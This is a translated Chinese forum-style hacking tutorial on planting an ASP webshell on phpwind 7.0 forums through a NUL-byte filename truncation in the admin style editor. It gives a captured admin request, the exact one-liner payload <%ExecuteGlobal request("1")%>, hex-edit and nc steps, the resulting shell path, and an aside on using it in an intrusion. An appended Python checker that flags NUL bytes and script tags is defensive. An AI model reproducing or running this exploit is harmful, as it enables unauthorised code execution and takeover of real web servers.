How to get a shell on phpwind 7.0

Notes from the evening of the 21st, written after breaking into a PHPWIND forum. This applies when PHPWIND has no upload available and the three shell-grabbing methods circulating online all fail; it is worth a try, and it should count as a vulnerability in the PHPWIND admin backend.
Tools to prepare: Winsock Expert v0.6 beta1, UE-32.EXE, NC.EXE, and one computer (cue a hail of bricks...).

Let's get to work. First open Winsock Expert, then start IE and log into the admin backend (who's throwing bricks over there...).

Go to Style Files >>>> Style Templates >>>> Add Style. In the first field, "folder name of this style under the image directory", enter TEST (or FUCKCNN...), then submit.

Then click [Return and continue], find the style you just created, and click Edit:
Now it is Winsock Expert's turn...
Attach to the IE process, capture, and change something trivial on the form, for example the 98% below to 97%. The only thing that matters here is getting the packet captured; nothing else.

The captured data is as follows:
1:
POST /phpwind/upload/admin.php?adminjob=setstyles&verify=bb457aae& HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://x22222.h21.ttrr.com/phpwi ... n=edit&sid=test
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; User-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; http://bsalsa.com) ; .NET CLR 2.0.50727)
Host: x22222.h21.ttrr.com
Content-Length: 473
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: 9f9e2_lastpos=T3; 9f9e2_ol_offset=97; 9f9e2_threadlog=%2C2%2C; 9f9e2_winduser=C20FAgIEVABSV1RYUAQDVwICDVcAA1MDVwcGBwEFUgUABGg%3D; 9f9e2_ck_info=%2F%09; 9f9e2_lastvisit=7102%091208851845%09%2Fphpwind%2Fupload%2Fread.php%3Ftid%3D3; 9f9e2_ipfrom=32f09dc105198e55683b704b0f8fbc6b%09%B9%E3%B6%AB%CA%A1%0D; 9f9e2_readlog=%2C1%2C2%2C3%2C; 9f9e2_adskin=0; 9f9e2_cknum=CFZUCggDVABSDDtoA1ZRB1VTCQVUCgJVUwMGAQpXBgdcB1FWWwUHAgFWVlA%3D; 9f9e2_AdminUser=CFZUCggAXQVVBDsAVV4MWmgHWF0BBlUPUAZTDQZTBlIAVlcDXFIGVFNWAVFQUFADBTo%3D

2:
action=edit&step=3&sid=test&setting%5B0%5D=test&setting%5B1%5D=wind&setting%5B2%5D=1&setting%5B7%5D=97%25&setting%5B8%5D=98%25&setting%5B3%5D=%23fff&setting%5B4%5D=%232f5fa1&setting%5B5%5D=%23B6D9E3&setting%5B6%5D=%23D4EFF7&setting%5B9%5D=%2376BAC2&setting%5B10%5D=%2376BAC2&setting%5B11%5D=%23005681&setting%5B12%5D=%235495A0&setting%5B13%5D=%23F7F7F7&setting%5B14%5D=%23D6E8CB&setting%5B15%5D=%23659b28&setting%5B16%5D=%23ffffff&setting%5B17%5D=%23F4FBFF&setting%5B18%5D=
Save them as a.txt and b.txt respectively.

Now the important part. Open b.txt, change the third parameter sid=test to sid=test.aspa, and change the last parameter to setting%5B18%5D=%0D%0C%3C%25ExecuteGlobal+request%28%221%22%29%25%3E, which decoded is simply [carriage return]<%ExecuteGlobal request("1")%>

Save it. Then check the size of b.txt: 530 bytes. Now that the body is ready, attach it to the request.

Good. Copy the contents of b.txt to the bottom of a.txt, open a.txt in UE-32, change the header line Content-Length: 473 to Content-Length: 530, then switch to [hex mode] and change the third parameter you just edited, sid=test.aspa, to sid=test.asp followed by a single byte; note that this byte must be hex 00 (replace the trailing "a" with 00). Save.

Send it with NC.EXE.

OK, now log in over FTP and check whether TEST.ASP was generated (if this is an intrusion, of course, just connect to it directly with a one-liner shell client).

Remember that the generated file is at bbs.xxxxxxxxx.com/data/style/test.asp

Summary: the cause of the vulnerability is the same as the old DVBBS (动网) upload vulnerability from long ago: the 00 byte is not filtered. When we append 00 to the generated file name, phpwind assumes the string has ended and writes out exactly the ASP file we want. Many people ask whether it can generate PHP directly. I have kept trying, but there is no way, because PHP wraps the one-liner we submit inside single quotes, so our one-liner cannot execute, whereas single quotes do not affect execution in ASP. Since I do not know PHP, I do not know whether there is another way; I hope this post throws out a brick to attract jade (cannot type the character) and that the experts will solve this one.
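As an added defender-side example (not from the original post), the following Python check inspects a captured setstyles POST body for the two things this trick depends on: a NUL byte in the style folder name (sid) and server-side script tags in a setting value. The folder-name allow-list and both sample bodies are constructed for this example, not taken from phpwind's own code.

```python
import re
from urllib.parse import parse_qsl

# Allow-list for style folder names written under data/style.
# This rule is an assumption for the example, not phpwind's own check.
STYLE_NAME_RE = re.compile(r'^[A-Za-z0-9_-]{1,32}$')
# Opening tags of ASP (<%) or PHP (<?) code inside a value that ends up in a file.
SERVER_TAG_RE = re.compile(r'<%|<\?')


def is_safe_style_name(name: str) -> bool:
    """Reject NUL bytes, dots, slashes and anything else outside the allow-list."""
    return '\x00' not in name and STYLE_NAME_RE.match(name) is not None


def check_style_request(body: str) -> list:
    """Scan one admin.php?adminjob=setstyles POST body; return findings (empty = clean).

    parse_qsl decodes %00 to a NUL character and %5B/%5D to [ ], so a NUL sent
    as %00 or patched in as a raw byte is seen the same way.
    """
    findings = []
    for name, value in parse_qsl(body, keep_blank_values=True):
        if '\x00' in value:
            findings.append(f'null byte in {name}')
        if name == 'sid' and not is_safe_style_name(value):
            findings.append(f'sid is not a plain folder name: {value!r}')
        if name.startswith('setting[') and SERVER_TAG_RE.search(value):
            findings.append(f'server-side script tag in {name}')
    return findings


# Constructed samples, abbreviated from the capture above.
BENIGN_BODY = ('action=edit&step=3&sid=test&setting%5B0%5D=test&setting%5B1%5D=wind'
               '&setting%5B7%5D=97%25&setting%5B3%5D=%23fff&setting%5B18%5D=')
# Same request with a NUL after ".asp" and a placeholder <% ... %> block in the last field.
TAMPERED_BODY = ('action=edit&step=3&sid=test.asp%00&setting%5B0%5D=test'
                 '&setting%5B18%5D=%0D%0C%3C%25+placeholder+%25%3E')

if __name__ == '__main__':
    print('benign  :', check_style_request(BENIGN_BODY))
    print('tampered:', check_style_request(TAMPERED_BODY))
```

The same two checks applied server-side before the folder name reaches the filesystem (rejecting the request rather than just logging it) close the hole the write-up relies on.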
